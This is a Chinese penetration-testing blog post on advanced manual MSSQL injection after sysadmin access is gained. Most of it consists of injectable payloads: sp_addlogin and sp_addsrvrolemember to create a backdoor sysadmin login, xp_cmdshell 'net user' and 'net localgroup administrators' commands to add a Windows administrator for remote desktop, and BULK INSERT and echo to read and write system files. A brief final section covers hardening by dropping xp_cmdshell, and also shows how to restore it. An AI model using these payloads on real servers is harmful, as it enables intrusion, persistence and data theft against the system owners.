最新消息:

MSSQL手工注入之高级应用

渗透测试 Eternal 4945浏览 0评论

这篇文章,将介绍一些MSSQL注入中更加高级的玩法。既然我们已经是数据库的最高管理员权限了,那么自然我们能做的事就非常的多了。

一. 数据库用户的提权

1.建立数据库用户:

通过数据库的?sp_addlogin 扩展来添加用户。
;exec master..sp_addlogin secist,888888;–

2.把secist用户加入到sysadmin:

通过数据库的?sp_addsrvrolemember 扩展来将普通用户添加到管理员组。
;exec master..sp_addsrvrolemember secist,sysadmin;–

3.利用漏洞:
利用数据库连接器:查询分析器—文件–连接:数据库服务器 例如:ip:192.168.2.8 用户名:secist 密码:888888 。这样我们就可以通过图形界面进行各操作!

二.?操作系统的提权

1.建立系统用户:

通过数据库的 xp_cmdshell 扩展来添加用户。
;exec master..xp_cmdshell ‘net user secist 88888 /add’–

2.提权:把secist加入administrators组:

;exec master..xp_cmdshell ‘net localgroup administrators secist /add’–

3.利用:

远程桌面:3389 ,mstsc.exe 。

三. 读系统写文件

1.利用查询分析器连接数据库:secist,888888
2.create table vvboot(line varchar(8000))
3.bulk insert vvboot from ‘c:\boot.ini’
4.select * from vvboot

四. 向系统写文件

;exec master..xp_cmdshell ‘echo aaa >>c:u.txt’–

五. 防xp_cmdshell,xplog70.dll

如果想防止攻击者利用?xp_cmdshell 来调用系统命令,我们可以通过命令来删除该扩展。从而达到使攻击者,无法正常进行调用的目的。
1.删除:
;exec master..sp_dropextendedproc ‘xp_cmdshell’

2.恢复:
;exec master..sp_addextendedproc ‘xp_cmdshell’,’xplog70.dll’

3.终极防:xp_cmdshell,防未公布溢出漏洞:
c:\windows\system32\cmd.exe
删除所有权限,添加 administrator 完全控制。

原创文章,转载请注明来源 即刻安全

转载请注明:即刻安全 » MSSQL手工注入之高级应用

您必须 登录 才能发表评论!



合作伙伴